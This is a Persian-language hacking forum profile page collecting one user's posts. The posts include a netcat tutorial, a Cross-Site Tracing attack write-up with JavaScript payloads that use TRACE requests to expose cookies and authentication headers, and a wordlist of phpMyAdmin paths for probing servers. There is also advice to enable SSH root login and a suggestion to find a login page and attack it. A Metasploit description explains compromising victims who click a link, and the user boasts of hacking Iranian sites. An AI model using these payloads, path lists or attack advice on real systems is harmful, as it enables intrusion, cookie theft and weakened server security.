Mr.Nashena3

کاربر انجمن
  • تعداد ارسال ها

    65
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    14

آخرین بار برد Mr.Nashena3 در خرداد 9

Mr.Nashena3 یکی از رکورد داران بیشترین تعداد پسند مطالب است!

1 دنبال کننده

درباره Mr.Nashena3

  • درجه
    1

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمیشود.

  1. Mr.Nashena3

    سلام دوست من معمولا در نتکت مجموع چند سوئچ باهم استفاده می‌شه Port Scan آزمایشکنندگان نفوذ معمولا از تکنیک های اسکن پورت برای جمع آوری اطلاعات استفاده می کنند. Nmap یکی از محبوب ترین ابزار برای پیدا کردن پورت های باز است. Netcat می تواند عملکرد پورت اسکن را ارائه دهد. مزیت netcat ساده و بدون وابستگی کتابخانه است. باینری netcat تنها برای اسکن پورت کافی است و می تواند برای تمام سیستم عامل های مانند ویندوز، لینوکس، یونیکس، MacOS، BSD استفاده شود. ما از گزینه -z برای پورت اسکن مانند زیر استفاده خواهیم کرد. در این مثال ما ip آدرس 192.168.180.1 را اسکن می کنیم که می تواند نام دامنه ای مانند target.com باشد. محدوده RAngePort 1-30 مشخص شده است. $ nc -z -v 192.168.122.1 1-30 Verbose Scan حالت خاموش حالت پیش فرض است که به معنی فقط پورت های باز در کنسول چاپ شده است گزینه ای -v که اطلاعات دقیق تر را تولید می کند TCP Server یکی دیگر از ویژگی های مفید netcat به عنوان یک سرور TCP عمل می کند. Netcat می تواند به پورت مشخص شده TCP گوش دهد. اما به عنوان یک اقدام امنیتی در سیستم های لینوکس تنها کاربران دارای امتیاز می توانند پورت های بین 1-1024 را گوش دهند. در این مثال ما به پورت های TCP گوش خواهیم داد. برای دادن امتیازات مورد نیاز از دستور sudo استفاده می کنیم. sudo nc -l -p 30 Send Files Trough Netcat یکی دیگر از ویژگی های مفید netcat انتقال فایل است. این داده ها می توانند برنامه یا یک فیلم باشند. netcat -l -p 4444 > myfile.txt اکنون می توانیم فایل را از سرویس گیرنده ارسال کنیم. ما فایل thefile.txt را در سمت سرویس گیرنده با تغییر مسیر به فایل netcat مانند زیر $ nc 192.168.180.1 4444 < thefile.txt Prevent DNS Lookup با استفاده ازDNS Lookup می توانید با گزینه -n غیرفعال کنید، این باعث می شود عملیات سریع تر انجام شود. netcat -n google.com 80 همانطور که در آموزش توضیح داده شده گزینه -n نام دامنه را غیرفعال میکند.
  2. با سلام اول بد نیست بگم ک اسم کاملش هست Cross-Site-Tracing ک به XST یا CST معروف هست XST یا CST یک فرم پیچیده از اسکریپت های (XSS) است که می تواند مانع از اقدامات امنیتی که قبلا برای محافظت در برابر XSS ایجاد شده است را کنار بگذارد. این شکل جدید حمله به نفوذگر اجازه می دهد کوکی ها و سایر اطلاعات احراز هویت را با استفاده از یک اسکریپت ساده در سمت سرویس گیرنده بدست آورد. به منظور محافظت از XST، کاربران اینترنت می توانند جاوا اسکریپت یا اکتیو ایکس را در مرورگرهای خود غیرفعال کنند. آموزش آیا هدف از HTTP TRACE پشتیبانی می کند؟ - با NetCat برای دانستن بر روی دستگاه لینوکس خود بروید و NETCAT را دانلود کنید. سپس، دستور زیر را دوست دارید nc www.target.com 80 چیزی شبیه به این باید بازگردانده شود HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 31 Oct 2006 08:00:29 GMT Connection: close Allow: GET, HEAD, POST, TRACE, OPTIONS Content-Length: 0 همانطور که در خط 5 دیده می شود، TRACE پشتیبانی می شود. با Telnet فقط این دستور را وارد کنید telnet www.target.com 80 اگر در گزارش مشاهده کنید خط "TRACE:yes"، بنابراین فعال شده است. با RESTClient (افزودنی فایرفاکس). لینک دانلود: https://addons.mozilla.org/ Exploitation هدف این است که برای وارد کردن یک اسکریپت XST (= request) در یک صفحه وب Target به عنوان یک روش POST. یک مثال: <script type=”text/javascript”> [b]<!--[/b] function sendTrace () { var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”); xmlHttp.open(“TRACE”, “INSERT_YOUR_URL_HERE”,false); xmlHttp.send(); xmlDoc=xmlHttp.responseText; alert(xmlDoc); } //--> </script> <INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”> توضیحات این اسکریپت را که شما می توانید در زیر ببینید : var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”); Object ایجاد می کند xmlHttp.open(“TRACE”, “INSERT_YOUR_URL_HERE”,false); نوع درخواست، URL را مشخص می کند و اگر درخواست باید به صورت غیر همزمان انجام شود یا نه. روش: نوع درخواست - GET یا POST url: محل فایل در سرور async: true (ناهمزمان) یا false (همگام) xmlHttp.send(); برای انتقال اطلاعات به سرور استفاده می شود xmlDoc=xmlHttp.responseText; داده های پاسخ را به عنوان یک رشته دریافت کنید alert(xmlDoc); نمایش محتوای XML با استفاده از جاوا اسکریپت <INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”>یک دکمه را ایجاد می کند. برای بازگرداندن، اسکریپت هنگام کلیک بر روی آن شروع می شود. اسکریپت دیگر، که برای XST بهتر است: <script type=”text/javascript”> function xssDomainTraceRequest(){ var exampleCode = “var xmlHttp = new ActiveXObject(\”Microsoft.XMLHTTP\”)\;xmlHttp.open(\”TRACE\”,\”INSERT_YOUR_URL_HERE\”,false)\ ;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;”; var target = “INSERT_YOUR_URL_HERE”; cExampleCode = encodeURIComponent(exampleCode + ‘;top.close()’); var readyCode = ‘font-size:expression(execScript(decodeURIComponent(“’ + cExampleCode + ‘”)))’; showModalDialog(target, null, readyCode); } </script> <INPUT TYPE=BUTTON OnClick=”xssDomainTraceRequest()” VALUE=”Show Cookie Information Using TRACE”> توضیحات بعضی از دستورات (خب صادقانه، من توضیح نمی دم - برای اسکریپت اول ساده تر بود): توجه داشته باشید که بخشی از داده هایی که دریافت می کنید (مانند پارامتر مجوز) در BASE64 کد گذاری می شود. شما می توانید تن از رمزگشایی های BASE64 را پیدا کنید، اما من این را توصیه می کنم: https://www.base64decode.org/ شما باید یک classic JS window داشته باشید که وقتی کد اسکریپت را می بینید ظاهر می شود. در حال حاضر، تفاوت های زیادی با XSS نمی بینید.
  3. Mr.Nashena3

    با سلام خوب دوست من شما طبق آموزش زیر عمل کنید # apt-get update # apt-get install ssh # systemctl enable ssh # service ssh start این فایل رو ادیت کنید /etc/ssh/sshd_config کد زیر را اضافه کنید FROM: #PermitRootLogin prohibit-password TO: PermitRootLogin yes و در آخر # service ssh restart اگر باز مشکل حل نشد بگید
  4. با سلام میتونید این لیست رو تست کنید. /phpMyAdmin/ /phpmyadmin/ /PMA/ /admin/ /dbadmin/ /mysql/ /myadmin/ /phpmyadmin2/ /phpMyAdmin2/ /phpMyAdmin-2/ /php-my-admin/ /phpMyAdmin-2.2.3/ /phpMyAdmin-2.2.6/ /phpMyAdmin-2.5.1/ /phpMyAdmin-2.5.4/ /phpMyAdmin-2.5.5-rc1/ /phpMyAdmin-2.5.5-rc2/ /phpMyAdmin-2.5.5/ /phpMyAdmin-2.5.5-pl1/ /phpMyAdmin-2.5.6-rc1/ /phpMyAdmin-2.5.6-rc2/ /phpMyAdmin-2.5.6/ /phpMyAdmin-2.5.7/ /phpMyAdmin-2.5.7-pl1/ /phpMyAdmin-2.6.0-alpha/ /phpMyAdmin-2.6.0-alpha2/ /phpMyAdmin-2.6.0-beta1/ /phpMyAdmin-2.6.0-beta2/ /phpMyAdmin-2.6.0-rc1/ /phpMyAdmin-2.6.0-rc2/ /phpMyAdmin-2.6.0-rc3/ /phpMyAdmin-2.6.0/ /phpMyAdmin-2.6.0-pl1/ /phpMyAdmin-2.6.0-pl2/ /phpMyAdmin-2.6.0-pl3/ /phpMyAdmin-2.6.1-rc1/ /phpMyAdmin-2.6.1-rc2/ /phpMyAdmin-2.6.1/ /phpMyAdmin-2.6.1-pl1/ /phpMyAdmin-2.6.1-pl2/ /phpMyAdmin-2.6.1-pl3/ /phpMyAdmin-2.6.2-rc1/ /phpMyAdmin-2.6.2-beta1/ /phpMyAdmin-2.6.2-rc1/ /phpMyAdmin-2.6.2/ /phpMyAdmin-2.6.2-pl1/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.3-rc1/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.3-pl1/ /phpMyAdmin-2.6.4-rc1/ /phpMyAdmin-2.6.4-pl1/ /phpMyAdmin-2.6.4-pl2/ /phpMyAdmin-2.6.4-pl3/ /phpMyAdmin-2.6.4-pl4/ /phpMyAdmin-2.6.4/ /phpMyAdmin-2.7.0-beta1/ /phpMyAdmin-2.7.0-rc1/ /phpMyAdmin-2.7.0-pl1/ /phpMyAdmin-2.7.0-pl2/ /phpMyAdmin-2.7.0/ /phpMyAdmin-2.8.0-beta1/ /phpMyAdmin-2.8.0-rc1/ /phpMyAdmin-2.8.0-rc2/ /phpMyAdmin-2.8.0/ /phpMyAdmin-2.8.0.1/ /phpMyAdmin-2.8.0.2/ /phpMyAdmin-2.8.0.3/ /phpMyAdmin-2.8.0.4/ /phpMyAdmin-2.8.1-rc1/ /phpMyAdmin-2.8.1/ /phpMyAdmin-2.8.2/ /sqlmanager/ /mysqlmanager/ /p/m/a/ /PMA2005/ /pma2005/ /phpmanager/ /php-myadmin/ /phpmy-admin/ /webadmin/ /sqlweb/ /websql/ /webdb/ /mysqladmin/ /mysql-admin/
  5. Mr.Nashena3

    سلام دوست من سوالت معلوم نیست پرت کجا باز کنی؟
  6. Mr.Nashena3

    با سلام خوب همین اول بابت غلت ها املایی عذر میخوام پای بی سوادی نزارین تاپیک جالبی بود گفتم منم بگم من که اسمم همون مستر ناشناس هست و خودم رو یک هکر نمیدونم ولی خوب هک و امنیت رو دوست دارم من هم مثل بقیه دوستان از بچگی شروع کردن با داس و ویندوز و... حال هم لینوکس زمان یاهو تیم امنیتی داشتم وبرنامه های مختلف برای یاهو مینوشتم مثل بوتر کرکر دی اکتیور آیدی میکر و امسال اینها دوستان یادشونه هنوز تو بعضی از سایت های خارجی اون برنامه ها هست بعد چندین سال کافی نت داشتم که اون زمان ای دی اس ال نبود چند خط تلفن داشتم بعد های ای دی اس ال آمد اولین بار هک ای دی اس ال در ایران آموزشش رو من ساختم اگر اشتباه نکنم یا دروغ نگم که باعث معروفیتم شد بعد از اون شروع به هک سایت ها معتبر ایرانی کردم ( بچه بودیم دیگه ) الانم بچه ایم :(( ( اینم بگم که خیلی از کارها رو نمیتونم بگم چون ما اکثر کارهامون بدون اسم و نشون انجام میشه مثل بقیه دوستان فقط بچه بازی هاشو میتونم بگم بعد هم که از ایران رفتم و چندین سال در شرکت اس آ پی SAP مشغول بودم . الانم که مهم نیست کجام و چه میکنم کوچک ترین عضو اینجا هستم و در مقابل دوستان ما شاگرد و تماشاگریم/ یا علی فعلا/
  7. Mr.Nashena3

    با سلام خوب من هم بعد از مدت ها دارم به پست میزارم بریم سراغش . فعال کردن SELinux خیلی کوتاه میگم برای این کار اول باید بدونید که SELinux میشه به سه حالت پیکربندی کرد Disabled: Turned-off Permissive: Prints warnings Enforcing: Policy is enforced خوب ابتدا با فرمان زیر فایل کامفیگ رو ادیت میکنیم #nano /etc/selinux/config بعد از آن SELINUX را به حالت enforcing تعغییر بدید SELINUX=enforcing تصویر امید وارم مفید بوده باشه
  8. Mr.Nashena3

    نسخه جدید ترش رو میتونید از سایت خود نرم افزار به آدرس زیر دانلود کنید. دانلود
  9. لینک آموزش رو دوستمون قرار داد شما کجاش دقیقا مشکل داری
  10. با سلام دوست من مهم نیست که در کدام بخش هست شما باید صفحه لوگین رو پیدا کنید و از آنجا حمله رو انجام بدید
  11. Mr.Nashena3

    با سلام نه دوست من اگر فقط اسکن باشه و مشکلی برای سایت ایجاد نشه اسکن هیچ سایتی حتی سایت دولتی ایرانی جرم نیست
  12. ۲. Metasploit Penetration Testing Software پروژه متااسپلویت — پروژه اختصاص داده شده به امنیت اطلاعات است. طراحی شده برای ارائه اطلاعات در مورد آسیب‌پذیری ایجاد یک امضا برای شناسهایجاد و تست از سوء استفاده. معروف‌ترین پروژه چارچوب متاسپلویت — یک بستر مناسبی برای ایجاد و اشکال زدایی سوء استفاده است. این پروژه شامل پایه opcodes بایگانی شل کد و اطلاعات مربوط به تحقیقات امنیت کامپیوتر است. متاسپلویت در ژوئیه سال ۲۰۰۳ ایجاد شد است. نسخه ۱٫۰ نوشته شده با زبان پرل و شامل رابط کاربری گرافیکی بر اساس curses است. ساخته شده توسط HD Moore. هنگامی که کار بر روی نسخه‌ای (۲.x) او با مت میلیر و چند داوطلب همکاری می‌کند. نسخه سوم به طور کامل به زبان روبی بازنویسی شد و توسط Metasploit, LLC توسعه یافت. (تأسیس شده توسط توسعه دهندگان در سال ۲۰۰۶). در سال ۲۰۰۸ مجوز از چارچوب متاسپلویت اختصاصی به BSD تغییر کرد. در سال ۲۰۰۹ شرکت Rapid7 درگیر در مدیریت آسیب‌پذیری او اعلام کرد متاسپلویت محبوب منبع باز بسته دو منظوره برای انجام تست نفوذ. غیر تجاری نسخه هنوز هم در دسترس برای همه خواهد بود. به عنوان همتایان تجاری، با نسخه رایگان از متاسپلویت هر دو توسط مدیران سیستم و متخصصان امنیتی برای محافظت از سیستم‌های کامپیوتری و هکرها-یا کراکرهای scriptkiddies برای به دست آوردن دسترسی‌های غیرمجاز برای کنترل سیستم‌ها از راه دور استفاده می‌شود. چارچوب متاسپلویت یک ابزار برای تست نفوذ و استفاده از اکسپلویت است که اجازه می‌دهد تا شما طراحی و اکسپلویت‌های لازم در این مورد خاص از فشار نبرد که پیلود است که در صورت عدم موفقیت حمله برای مثال نصب یک پوسته یا یک VNC سرور امکان‌پذیر می‌کند. همچنین این چارچوب امکان رمز نگاری کد شل را می‌دهد که می‌تواند این حمله از شناسه یا IPSپنهان کند. برای حمله به سرور از راه دور سرویس‌ها و نسخه‌ها که نیاز تحقیقات بیشتری دارد می‌توان با کمک ابزار ان‌مپ یا nessus انجام داد. پایگاه opcodes ابزار مورد نیاز برای نوشتن اکسپلویت‌های جدید. این ابزار به شما اجازه می‌دهد که اکسپلویت که با نسخه‌های مختلف سیستم عامل طراحی و کد نویسی کنید. نرم‌افزار متااسپلویت (به انگلیسی: Metasploit) یک نرم‌افزار قوی برای نفوذ به سیستم‌های دیگر است. این نرم‌افزار امکان دسترسی به شل قربانی را به راحتی حتی بر روی ویندوز ۷ فراهم می‌کند. طرز کار این نرم‌افزار، برای شما پیوندی به برای آی‌پی‌تان با فایل نفوذ ایجاد می‌کند. کسی که روی این پیوند کلیک کند، این فایل را وارد رایانهٔ خود کرده و پس از وارد شدن این فایل به رایانهٔ فرد شما می‌توانید به راحتی دستورهای گوناگون را بر روی رایانهٔ فرد قربانی اجرا کنید. سیستم‌های میزبان این نرم‌افزار امکان نصب بر روی گنو/لینوکس، ویندوز و مک اواس را دارا می‌باشد. برای نسخهٔ لینوکس از روبی استفاده شده است. منبع : https://fa.wikipedia.org/wiki/%D9%85%D8%AA%D8%A7%D8%B3%D9%BE%D9%84%D9%88%DB%8C%D8%AA https://fa.wikipedia.org/wiki/%D9%85%D8%AA%D8%A7%D8%A7%D8%B3%D9%BE%D9%84%D9%88%DB%8C%D8%AA دانلود : Download
  13. Mr.Nashena3

    با سلام دوست من شما مخازن رو آپدیت کن برای این کار از آموزش زیر استفاده کنید بعد از آن کالی رو آپدیت و آپگریت کنید برای این کار از فرمان زیر استفاده کن apt-get update && apt-get upgrade بعد از آن وین رو نصب کن اگر باز مشکلی داشتی اینجا اعلام کن با عکس تا من یا دوستان دیگه کمک کنن
  14. 1. Nmap (Network Mapper) ان‌مپ (به انگلیسی: Nmap) (برگرفته از حروف اول Network Mapper) یک پویشگر امنیتی است که در ابتدا به دست گُردُن لیون (با اسم مستعار فیودور واسکوویچ) نوشته شده و برای کشف میزبان‌ها و خدمتگزاران در یک شبکه رایانه‌ای و در نتیجه ایجاد یک «نگاشت» از شبکه، استفاده می‌شود. برای این منظور ان‌مپ بسته‌های دستکاری شده را به سمت هدف می‌فرستد و سپس پاسخ آن‌ها را تحلیل می‌کند. برخلاف بسیاری از پویشگرهای ساده پورت (port scanner) که فقط با یک نرخ ارسال ثابت که از قبل تعیین شده بسته‌ها را ارسال می‌کنند، ان‌مپ شرایط شبکه (نوسانات تأخیر، ازدحام شبکه، تداخل هدف در پویش) را نیز در نظر می‌گیرد. همچنین با در دست داشتن جامعه کاربری بزرگی که بازخورد می‌دهند و در تکامل امکانات آن شرکت می‌کنند، ان‌مپ قادر به توسعه بیش از پیش قابلیت‌های اکتشافی‌اش خارج از محدوده فقط فهم باز و بسته بودن پورت یا در دسترس بودن میزبان بوده است؛ ان‌مپ قادر است سیستم عامل هدف، نام و نسخه خدمات (services)، مدت زمان تخمینی در دسترس بودن (uptime)، نوع دستگاه و حضور فایروال را تشخیص دهد. ان‌مپ روی لینوکس، ویندوز، سولاریس، HP-UX و نسخه‌های مختلف بی اس دی (شامل مک اواس ایکس) و همچنین آمیگا اواس و SGI IRIX اجرا می‌شود. رایج‌ترین سکوی اجرای ان‌مپ، لینوکس است که ویندوز با اختلاف کمی آن را دنبال می‌کند. ویژگی‌ها از ویژگی‌های ان‌مپ می‌توان موارد زیر را نام برد: کشف میزبان - تشخیص میزبان‌ها در شبکه (بر اساس پاسخ به پینگ (Ping) یا بازبودن پورت خاص) پویش پورت‌ها تشخیص نسخه برنامه‌ها و خدمات تشخیص سیستم عامل تعامل به شکل اسکرپتی با هدف - با استفاده از موتور اسکریپت ان‌مپ (Nmap Scripting Engine)و زبان لوا، می‌توان پرس‌وجوهای سفارشی ساخت. علاوه بر موارد بالا، ان‌مپ اطلاعات بیشتری از اهداف شامل برگردان نام دی‌ان‌اس، اطلاعات قطعات، و آدرس مک را فراهم سازد. موراد استفاده از ان‌مپ: بررسی امنیت شبکه یک دستگاه با کشف اتصالات شبکه‌اس که می‌تواند به آن وصل شود. کشف پورت‌باز روی هدف قبل از تست نفوذپذیری سیستم. لیست گیری شبکه، نگاشت، نگهداری و مدیریت منابع شبکه. بررسی امنیت شبکه با کشف سرویس‌های جدید پیش‌بینی نشده. منبع : https://fa.wikipedia.org/wiki/ان‌مپ دانلود : Download
  15. با سلام در این پست میخوام ۱۰ ابزار برتر هک در سال ۲۰۱۸ رو در اینجا معرفی کنم امیدوارم که مفید باشه سوالات خود راجب هر یک از ابزار رو در یک پست جدید اعلام کنید با تشکر Mr.Nashena3